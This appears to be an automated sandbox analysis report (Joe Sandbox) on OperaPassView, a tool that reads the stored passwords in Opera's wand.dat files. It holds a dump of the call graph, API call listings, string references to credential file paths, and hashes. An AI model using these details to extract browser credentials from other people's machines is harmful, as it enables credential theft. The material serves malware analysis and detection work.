SetWindowTextW SetDlgItemTextW SetDlgItemTextW 5014->5020 5015->5020 5025 40111f 5016->5025 5026 40125e EndDialog DeleteObject 5016->5026 5018 4010c7 5017->5018 5019 4011df GetDlgItem 5017->5019 5021 4010d2 5018->5021 5022 40115d GetDlgItem ChildWindowFromPoint 5018->5022 5023 4011f4 SetBkMode SetTextColor GetSysColorBrush 5019->5023 5024 40121a 5019->5024 5042 40103e 5020->5042 5021->5025 5028 4010da GetDlgItem ChildWindowFromPoint 5021->5028 5030 4011b0 5022->5030 5031 401193 GetModuleHandleW LoadCursorW SetCursor 5022->5031 5023->5025 5024->5025 5029 401228 GetDlgItem 5024->5029 5026->5013 5034 401129 5028->5034 5040 401110 5028->5040 5029->5025 5035 40123b 5029->5035 5030->5025 5036 4011be GetDlgItem ChildWindowFromPoint 5030->5036 5031->5025 5033 403ffe 5 API calls 5033->5025 5034->5025 5037 401137 GetDlgItem ChildWindowFromPoint 5034->5037 5035->5023 5036->5025 5038 4011dd 5036->5038 5037->5025 5037->5040 5038->5031 5041 4040a4 ShellExecuteW 5040->5041 5041->5025 5047 403d15 memset wcscpy 5042->5047 5044 401056 CreateFontIndirectW SendDlgItemMessageW 5045 401088 SendDlgItemMessageW 5044->5045 5046 40109c 5044->5046 5045->5046 5046->5033 5047->5044 5048 401ea0 5049 401fa5 5048->5049 5052 401eb3 5048->5052 5061 406ad7 5049->5061 5051 4045dc 7 API calls 5051->5052 5052->5051 5053 40459c free 5052->5053 5054 401e31 memset WideCharToMultiByte strlen WriteFile 5052->5054 5055 401f91 5052->5055 5053->5052 5054->5052 5058 401e31 5055->5058 5057 401f9e 5059 40b9f0 5058->5059 5060 401e3e memset WideCharToMultiByte strlen WriteFile 5059->5060 5060->5057 5062 406af8 5061->5062 5063 406aeb 5061->5063 5065 406b0c 5062->5065 5066 406afd 5062->5066 5082 406536 5063->5082 5068 406b11 5065->5068 5069 406b1e 5065->5069 5088 40641a 5066->5088 5098 406646 5068->5098 5071 406b32 5069->5071 5072 406b23 5069->5072 5073 406b46 5071->5073 5074 406b37 5071->5074 5106 4066c2 5072->5106 5078 406b58 5073->5078 5079 406b4b 5073->5079 5118 4067ea memset memset memset memset 5074->5118 5075 406af6 5075->5057 5078->5075 5154 406a28 5078->5154 5140 406583 5079->5140 5083 40656f 5082->5083 5087 40653e 5082->5087 5165 403992 wcslen WriteFile 5083->5165 5085 40657d 5085->5075 5086 403992 wcslen WriteFile 5086->5087 5087->5083 5087->5086 5089 406521 5088->5089 5096 40642f 5088->5096 5166 4063af 5089->5166 5091 40652f 5091->5075 5092 406444 wcschr 5093 406454 wcschr 5092->5093 5092->5096 5093->5096 5094 4045dc 7 API calls 5094->5096 5095 4063af memset WideCharToMultiByte strlen WriteFile 5095->5096 5096->5089 5096->5092 5096->5094 5096->5095 5097 40459c free 5096->5097 5097->5096 5099 406654 5098->5099 5100 4066ad 5098->5100 5099->5100 5101 406655 _snwprintf 5099->5101 5170 403992 wcslen WriteFile 5100->5170 5104 406687 _snwprintf 5101->5104 5103 4066bb 5103->5075 5169 403992 wcslen WriteFile 5104->5169 5171 403992 wcslen WriteFile 5106->5171 5108 4067d5 5195 403992 wcslen WriteFile 5108->5195 5110 4067e2 5110->5075 5113 40678b wcscat 5114 4066f9 5113->5114 5114->5108 5114->5113 5172 40abc0 _snwprintf 5114->5172 5173 40abf1 5114->5173 5179 40aceb memset memset 5114->5179 5119 406870 5118->5119 5120 4068a2 5119->5120 5197 40abc0 _snwprintf 5119->5197 5198 403992 wcslen WriteFile 5120->5198 5123 40688b _snwprintf 5123->5120 5124 406a05 5202 403992 wcslen WriteFile 5124->5202 5126 406a12 5203 403992 wcslen WriteFile 5126->5203 5127 4068d9 wcscpy 5133 4068af 5127->5133 5129 406a1f 5129->5075 5131 40abf1 3 API calls 5131->5133 5132 40697c wcscpy 5132->5133 5133->5124 5133->5127 5133->5131 5133->5132 5135 40699e wcscat 5133->5135 5137 40aceb 13 API calls 5133->5137 5199 40abc0 _snwprintf 5133->5199 5200 40abc0 _snwprintf 5133->5200 5135->5133 5136 406962 _snwprintf 5136->5133 5138 4069b9 _snwprintf 5137->5138 5201 403992 wcslen WriteFile 5138->5201 5204 403992 wcslen WriteFile 5140->5204 5142 4065bf 5205 403992 wcslen WriteFile 5142->5205 5144 4065cd 5145 406617 5144->5145 5147 4065e6 _snwprintf 5144->5147 5207 403992 wcslen WriteFile 5145->5207 5206 403992 wcslen WriteFile 5147->5206 5148 40662b 5208 403992 wcslen WriteFile 5148->5208 5151 406634 5209 403992 wcslen WriteFile 5151->5209 5153 40663d 5153->5075 5210 403992 wcslen WriteFile 5154->5210 5156 406ac2 5212 403992 wcslen WriteFile 5156->5212 5158 406a49 memset 5160 406a3f 5158->5160 5159 406ad0 5159->5075 5160->5156 5160->5158 5161 40abf1 3 API calls 5160->5161 5162 406327 2 API calls 5160->5162 5161->5160 5163 406a95 _snwprintf 5162->5163 5211 403992 wcslen WriteFile 5163->5211 5165->5085 5167 40b9f0 5166->5167 5168 4063bc memset WideCharToMultiByte strlen WriteFile 5167->5168 5168->5091 5169->5099 5170->5103 5171->5114 5172->5114 5177 40abfb 5173->5177 5174 40ac6d memcpy 5174->5177 5175 40ac20 memcpy 5175->5177 5176 40ac8c 5176->5114 5177->5174 5177->5175 5177->5176 5178 40ac53 memcpy 5177->5178 5178->5177 5180 40ad37 5179->5180 5181 40add2 5180->5181 5182 40ad4e wcscpy 5180->5182 5185 40ade4 wcscat 5181->5185 5186 40add7 wcscat 5181->5186 5183 40ad62 _snwprintf wcscat 5182->5183 5184 40ad89 5182->5184 5183->5184 5187 40adc5 wcscat 5184->5187 5196 40abc0 _snwprintf 5184->5196 5188 40ae01 5185->5188 5189 40adf4 wcscat 5185->5189 5186->5185 5187->5181 5191 4067a6 _snwprintf 5188->5191 5192 40ae06 wcscat 5188->5192 5189->5188 5194 403992 wcslen WriteFile 5191->5194 5192->5191 5193 40ad9e _snwprintf wcscat 5193->5187 5194->5114 5195->5110 5196->5193 5197->5123 5198->5133 5199->5133 5200->5136 5201->5133 5202->5126 5203->5129 5204->5142 5205->5144 5206->5144 5207->5148 5208->5151 5209->5153 5210->5160 5211->5160 5212->5159 5213 404da0 5214 40b9f0 5213->5214 5215 404dad memset GetDlgCtrlID 5214->5215 5216 404ed1 5 API calls 5215->5216 5217 404de1 5216->5217 5218 404df7 5217->5218 5219 404de7 SetWindowTextW 5217->5219 5219->5218 5220 40a7a0 5221 40a4ac 4 API calls 5220->5221 5222 40a7ce 5221->5222 5223 40b923 _XcptFilter 5224 40b6a5 _onexit 5225 40132a 5228 403d88 5225->5228 5227 401331 5229 403d91 SetDlgItemTextW 5228->5229 5230 403da4 GetDlgItemTextW 5228->5230 5229->5227 5230->5227 5231 403230 5232 403245 5231->5232 5233 40325e 5232->5233 5234 40324f 5232->5234 5239 403bde SendDlgItemMessageW 5233->5239 5238 403bbd SendDlgItemMessageW 5234->5238 5237 40325b 5238->5237 5239->5237 5240 40ba30 5241 40b6ca 2 API calls 5240->5241 5242 40ba3a 5241->5242 5243 408432 DeleteFileW 5244 408150 37 API calls 5243->5244 5245 40844a 5244->5245 5248 408409 5245->5248 5249 408430 PostQuitMessage 5248->5249 5250 408414 5248->5250 5253 405808 5250->5253 5252 408429 ??3@YAXPAX 5252->5249 5254 4057a2 5 API calls 5253->5254 5255 405816 5254->5255 5256 405829 5255->5256 5257 40459c free 5255->5257 5258 40583c 5256->5258 5260 40459c free 5256->5260 5259 405822 ??3@YAXPAX 5257->5259 5261 40584f 5258->5261 5263 40459c free 5258->5263 5259->5256 5262 405835 ??3@YAXPAX 5260->5262 5265 40459c free 5261->5265 5267 405862 5261->5267 5262->5258 5264 405848 ??3@YAXPAX 5263->5264 5264->5261 5266 40585b ??3@YAXPAX 5265->5266 5266->5267 5268 405893 free 5267->5268 5268->5252 5269 401433 5270 401435 GetModuleHandleW CreateWindowExW 5269->5270 5271 40b6b3 __dllonexit 5272 4031b3 GetClientRect GetWindow GetWindow 5273 4031e9 5272->5273 5279 401584 GetWindowRect MapWindowPoints 5273->5279 5275 4031ee GetWindow 5275->5273 5276 4031f9 GetDlgItem 5275->5276 5280 40ab86 LoadLibraryW GetProcAddress 5276->5280 5278 403210 GetDlgItem SetFocus 5279->5275 5281 40abb4 FreeLibrary 5280->5281 5282 40aba7 5280->5282 5281->5278 5282->5281 5283 40b937 5284 40b943 _exit 5283->5284 5285 40b94a _c_exit 5283->5285 5284->5285 5286 40b950 5285->5286 5287 401fb7 5290 40b625 5287->5290 5301 403960 CreateFileW 5290->5301 5292 40b62f 5293 40b637 GetFileSize 5292->5293 5294 401fcc 5292->5294 5295 40b685 CloseHandle 5293->5295 5296 40b64b ??2@YAPAXI memset 5293->5296 5295->5294 5302 40427e ReadFile 5296->5302 5298 40b66b 5299 40b67d ??3@YAXPAX 5298->5299 5303 40b400 5298->5303 5299->5295 5301->5292 5302->5298 5313 40b41a 5303->5313 5304 40b614 5304->5299 5305 40b431 memchr 5305->5304 5305->5313 5306 40b4da memcpy memcpy 5314 4097c8 5306->5314 5309 4097c8 8 API calls 5309->5313 5310 40b587 memcpy 5310->5313 5311 40b5d2 memset 5319 40b211 5311->5319 5313->5304 5313->5305 5313->5306 5313->5310 5313->5311 5348 408fc0 5314->5348 5316 4097fe 5355 40905e 5316->5355 5318 409809 memcpy memcpy memcpy 5318->5309 5320 40b229 5319->5320 5321 40b21e 5319->5321 5322 403a94 3 API calls 5320->5322 5332 40b22f 5320->5332 5323 403a94 3 API calls 5321->5323 5324 40b251 5322->5324 5323->5320 5325 403a94 3 API calls 5324->5325 5326 40b25e 5325->5326 5327 40b323 5326->5327 5328 40b28c _wcsicmp 5326->5328 5329 40b328 5327->5329 5330 40b34d 5327->5330 5331 40b2a1 _wcsicmp 5328->5331 5328->5332 5329->5332 5340 403bfd 2 API calls 5329->5340 5334 40b370 5330->5334 5335 40b352 5330->5335 5331->5332 5333 40b2be 5331->5333 5332->5313 5336 403bfd 2 API calls 5333->5336 5338 40b393 5334->5338 5339 40b375 5334->5339 5337 403bfd 2 API calls 5335->5337 5346 40b2cf 5336->5346 5337->5346 5342 40b3bc 5338->5342 5343 40b398 5338->5343 5341 403bfd 2 API calls 5339->5341 5340->5346 5341->5346 5345 403bfd 2 API calls 5342->5345 5342->5346 5344 403bfd 2 API calls 5343->5344 5343->5346 5344->5346 5345->5346 5346->5332 5347 403bfd 2 API calls 5346->5347 5347->5332 5349 408fd7 5348->5349 5350 408ff7 memcpy 5349->5350 5351 408ffe memcpy 5349->5351 5354 409015 5349->5354 5350->5316 5351->5354 5353 409024 memcpy 5353->5354 5354->5350 5354->5353 5356 409078 memset 5355->5356 5357 40909e memset 5355->5357 5362 4090dd 5356->5362 5359 4090ad 5357->5359 5361 4090c3 memcpy memset 5359->5361 5360 40908e memset 5360->5359 5361->5318 5362->5360 5366 406ebd 5367 406ec5 5366->5367 5368 406ecc 5366->5368 5369 4049df 16 API calls 5367->5369 5370 406eca 5369->5370 5371 40213d 5372 405b9a SendMessageW 5371->5372 5373 40215c 5372->5373 5374 403eeb modf 5373->5374 5375 402172 5374->5375 5376 40a73f 5379 40a406 5376->5379 5380 40a413 5379->5380 5381 40a432 memset 5380->5381 5382 40a465 memset GetPrivateProfileStringW 5380->5382 5387 4042bc 5381->5387 5391 404345 wcslen 5382->5391 5386 40a4a4 5389 404330 WritePrivateProfileStringW 5387->5389 5390 4042d0 5387->5390 5388 4042de _snwprintf memcpy 5388->5389 5388->5390 5389->5386 5390->5388 5390->5389 5392 404359 5391->5392 5393 40435b 5391->5393 5392->5386 5394 404391 wcstoul 5393->5394 5395 4043af 5393->5395 5394->5393 5395->5386

                                        Executed Functions

                                        Function 00408D32 Relevance: 42.2, APIs: 21, Strings: 3, Instructions: 169COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004022B7: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004022D6
                                          • Part of subcall function 004022B7: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004022E8
                                          • Part of subcall function 004022B7: FreeLibrary.KERNEL32(00000000), ref: 004022FC
                                          • Part of subcall function 004022B7: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00402327
                                        • SetErrorMode.KERNELBASE(00008001), ref: 00408D5A
                                        • GetModuleHandleW.KERNEL32(00000000,0040A86C,00000000), ref: 00408D73
                                        • EnumResourceTypesW.KERNEL32(00000000), ref: 00408D7A
                                        • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,/deleteregkey,/savelangfile), ref: 00408E11
                                        • DeleteObject.GDI32(?), ref: 00408E2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Library$??3@AddressDeleteEnumErrorFreeHandleLoadMessageModeModuleObjectProcResourceTypes
                                        • String ID: $/deleteregkey$/savelangfile
                                        • API String ID: 3591293073-28296030
                                        • Opcode ID: de3f40b4e55eeaaf1dac55b68430880ef7ee47ccc67b33af9c9c8b447cd1d60c
                                        • Instruction ID: b443d161a9bfda6ba7bb93ee09c3e4a052c8ad070ab97aa12102e52f6c463f3b
                                        • Opcode Fuzzy Hash: de3f40b4e55eeaaf1dac55b68430880ef7ee47ccc67b33af9c9c8b447cd1d60c
                                        • Instruction Fuzzy Hash: 4A611C71408345DBD720AF62DE4895FBBE9EFC4344F004A3EF684A2191DB7994158F9A
                                        Function 00408150 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 137COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00408181
                                          • Part of subcall function 00403CE2: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040556D,00000000,00405420,?,00000000,00000208), ref: 00403CED
                                        • wcsrchr.MSVCRT ref: 0040819F
                                        • wcscat.MSVCRT ref: 004081B9
                                        • memset.MSVCRT ref: 00408244
                                        • wcslen.MSVCRT ref: 00408265
                                        • wcslen.MSVCRT ref: 00408274
                                        • wcslen.MSVCRT ref: 004082D3
                                        • wcslen.MSVCRT ref: 004082E2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcslen$memset$FileModuleNamewcscatwcsrchr
                                        • String ID: .cfg$Opera\Opera7\profile\wand.dat$Opera\Opera\wand.dat
                                        • API String ID: 2318608877-1497048727
                                        • Opcode ID: 33e8aad3c5a6076f0ea671c7ce7c09fc12d2d20503ac13a8f891f9da74e1a541
                                        • Instruction ID: 5ce434d71b15ec2f64e036e0180c1da2dfbcaf4792122087830a502de8537aac
                                        • Opcode Fuzzy Hash: 33e8aad3c5a6076f0ea671c7ce7c09fc12d2d20503ac13a8f891f9da74e1a541
                                        • Instruction Fuzzy Hash: 8941CA729003089BDB10EF65D885A8A73B8FF44314F1408BFE559F71C2EB79AA548B8C
                                        Function 0040B772 Relevance: 18.1, APIs: 12, Instructions: 134COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 86 40b772-40b78c call 40b984 GetModuleHandleA 89 40b7ad-40b7b0 86->89 90 40b78e-40b799 86->90 92 40b7d9-40b828 __set_app_type __p__fmode __p__commode call 40b980 89->92 90->89 91 40b79b-40b7a4 90->91 93 40b7c5-40b7c9 91->93 94 40b7a6-40b7ab 91->94 99 40b836-40b88c call 40b96e _initterm __wgetmainargs _initterm 92->99 100 40b82a-40b835 __setusermatherr 92->100 93->89 97 40b7cb-40b7cd 93->97 94->89 96 40b7b2-40b7b9 94->96 96->89 101 40b7bb-40b7c3 96->101 102 40b7d3-40b7d6 97->102 105 40b89c-40b8a3 99->105 106 40b88e-40b897 99->106 100->99 101->102 102->92 108 40b8a5-40b8b0 105->108 109 40b8ea-40b8ee 105->109 107 40b956-40b95b call 40b9bd 106->107 110 40b8b2-40b8b6 108->110 111 40b8b8-40b8bc 108->111 113 40b8f0-40b8f5 109->113 114 40b8c3-40b8c9 109->114 110->108 110->111 111->114 115 40b8be-40b8c0 111->115 113->109 117 40b8d1-40b8e2 GetStartupInfoW 114->117 118 40b8cb-40b8cf 114->118 115->114 119 40b8e4-40b8e8 117->119 120 40b8f7-40b8f9 117->120 118->115 118->117 121 40b8fa-40b912 GetModuleHandleA call 408d32 119->121 120->121 124 40b914-40b915 exit 121->124 125 40b91b-40b954 _cexit 121->125 124->125 125->107
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                        • String ID:
                                        • API String ID: 2827331108-0
                                        • Opcode ID: e0c6bfa8702341f2c90823e91bb724e8eadc7258dc9a4fdf4a994c74bbcb6742
                                        • Instruction ID: ab676f94fb741c2de4f94484a28f2edc40db6796b33061c840ac924c3e863e0c
                                        • Opcode Fuzzy Hash: e0c6bfa8702341f2c90823e91bb724e8eadc7258dc9a4fdf4a994c74bbcb6742
                                        • Instruction Fuzzy Hash: D1517F75D00205DBCB21AFA4D988AAD7BB4FB44710F20827BE461B72E1D7784C82CB9D
                                        Function 0040AAE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55registryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 127 40aae0-40aaf7 call 40aab1 130 40aaf9-40ab02 call 403de2 127->130 131 40ab0b-40ab37 memset call 40a4dd 127->131 139 40ab09 130->139 136 40ab39-40ab6b wcscpy call 40a4f8 RegCloseKey 131->136 137 40ab6c-40ab80 wcscpy 131->137 136->137 138 40ab83-40ab85 137->138 139->138
                                        APIs
                                          • Part of subcall function 0040AAB1: LoadLibraryW.KERNEL32(shell32.dll,0040AAEF,?), ref: 0040AABF
                                          • Part of subcall function 0040AAB1: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AAD4
                                        • memset.MSVCRT ref: 0040AB1F
                                        • wcscpy.MSVCRT ref: 0040AB43
                                        • RegCloseKey.ADVAPI32(00408257,?,?,?,?,?,?,?,?,?), ref: 0040AB65
                                        • wcscpy.MSVCRT ref: 0040AB74
                                          • Part of subcall function 00403DE2: GetVersionExW.KERNEL32(00410A50,?,0040AAFE,?), ref: 00403DFC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: wcscpy$AddressCloseLibraryLoadProcVersionmemset
                                        • String ID: AppData
                                        • API String ID: 288233908-2707804156
                                        • Opcode ID: 8d49d394efc7713b9456a5529a91419b7c92975be1bbff4b9d4d8043798716bc
                                        • Instruction ID: 285cc4c544a26c6ac391f473c3cfc38f594349739ab536cf3326fa6f296e20f7
                                        • Opcode Fuzzy Hash: 8d49d394efc7713b9456a5529a91419b7c92975be1bbff4b9d4d8043798716bc
                                        • Instruction Fuzzy Hash: 6A01C471801218BADB10F7659C4AEEF777CDB44300F200476FA09B10C2E7796E54DAAB
                                        Function 00408AC8 Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 142 408ac8-408af2 ??2@YAPAXI@Z 143 408af4-408afd 142->143 144 408aff 142->144 145 408b01-408b16 ??2@YAPAXI@Z 143->145 144->145 146 408b18-408b3d call 4056f8 call 401a12 145->146 147 408b3f 145->147 149 408b41-408b55 146->149 147->149 151 408b64-408bbd call 403dbc call 401000 GetModuleHandleW LoadIconW call 4016d1 149->151 152 408b57-408b5e DeleteObject 149->152 152->151
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000220,00000000,?,?,?,00408DCA), ref: 00408AEA
                                        • ??2@YAPAXI@Z.MSVCRT(00001AEC,00000000,?,?,?,00408DCA), ref: 00408B0C
                                        • DeleteObject.GDI32(?), ref: 00408B58
                                        • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,00408DCA), ref: 00408BA0
                                        • LoadIconW.USER32(00000000,00000065), ref: 00408BA9
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@$DeleteHandleIconLoadModuleObject
                                        • String ID:
                                        • API String ID: 659443934-0
                                        • Opcode ID: 660448ec29b933ae47869e628f782440b5c7a0053d3100fe72f0c838a0ebb1a0
                                        • Instruction ID: 5d30767ec0c00a9ff56c1776cbe2dae35935defb109371278764e22d2acb7e78
                                        • Opcode Fuzzy Hash: 660448ec29b933ae47869e628f782440b5c7a0053d3100fe72f0c838a0ebb1a0
                                        • Instruction Fuzzy Hash: A92139B1901249DFCB70AFB99C896D977A8FF44314F108A3FE90CEB281DB7955108B58
                                        Function 0040A7E6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 171 40a7e6-40a7fd FindResourceW 172 40a864-40a869 171->172 173 40a7ff-40a80e SizeofResource 171->173 174 40a810-40a81c LoadResource 173->174 175 40a863 173->175 174->175 176 40a81e-40a827 LockResource 174->176 175->172 176->175 177 40a829-40a837 176->177 178 40a855-40a85e 177->178 179 40a839 177->179 178->175 180 40a83a-40a852 179->180 180->180 181 40a854 180->181 181->178
                                        APIs
                                        • FindResourceW.KERNELBASE(?,?,?), ref: 0040A7F3
                                        • SizeofResource.KERNEL32(?,00000000), ref: 0040A804
                                        • LoadResource.KERNEL32(?,00000000), ref: 0040A814
                                        • LockResource.KERNEL32(00000000), ref: 0040A81F
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: Resource$FindLoadLockSizeof
                                        • String ID:
                                        • API String ID: 3473537107-0
                                        • Opcode ID: c456b9334452d35e45e3ecd944d806d125ba2c6968af7380ccb795f94074ae4c
                                        • Instruction ID: 6c7702eab830fa794dbe4d4f612f035a24f1c300b0a6ce6b495dcb88548036a5
                                        • Opcode Fuzzy Hash: c456b9334452d35e45e3ecd944d806d125ba2c6968af7380ccb795f94074ae4c
                                        • Instruction Fuzzy Hash: BB018833600315EBCB195FA5DD8595B7F5EFF85290708C136F809EA2A0D770C951D688
                                        Function 0040493D Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 182 40493d-404944 183 40494a-4049d9 ??2@YAPAXI@Z * 4 182->183 184 4049de 182->184 183->184
                                        APIs
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,004049ED,004020A6,OperaPassView), ref: 00404977
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,004049ED,004020A6,OperaPassView), ref: 00404995
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049B3
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,004049ED,004020A6,OperaPassView), ref: 004049D1
                                        Memory Dump Source
                                        • Source File: 00000009.00000002.1722771856.0000000000401000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000009.00000002.1722740540.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000410000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722771856.0000000000412000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722849145.0000000000416000.00000080.00000001.01000000.0000000D.sdmpDownload File
                                        • Associated: 00000009.00000002.1722871201.0000000000417000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_9_2_400000_OperaPassView.jbxd
                                        Similarity
                                        • API ID: ??2@
                                        • String ID:
                                        • API String ID: 1033339047-0
                                        • Opcode ID: d78e13eaeaa92522975b109eca75e478145f83747a9411d93f1e62bee6f41732
                                        • Instruction ID: b3cae04eb33b1d64d1131991b9440b615a7550b70ba3bdc0b761ddafc789e2f0
                                        • Opcode Fuzzy Hash: d78e13eaeaa92522975b109eca75e478145f83747a9411d93f1e62bee6f41732
                                        • Instruction Fuzzy Hash: 40011EB66412407EEB589B38ED177AAA6E4E78D344F04863FA306CE2F4EB7544008B4C
                                        Function 00408C56 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 75COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
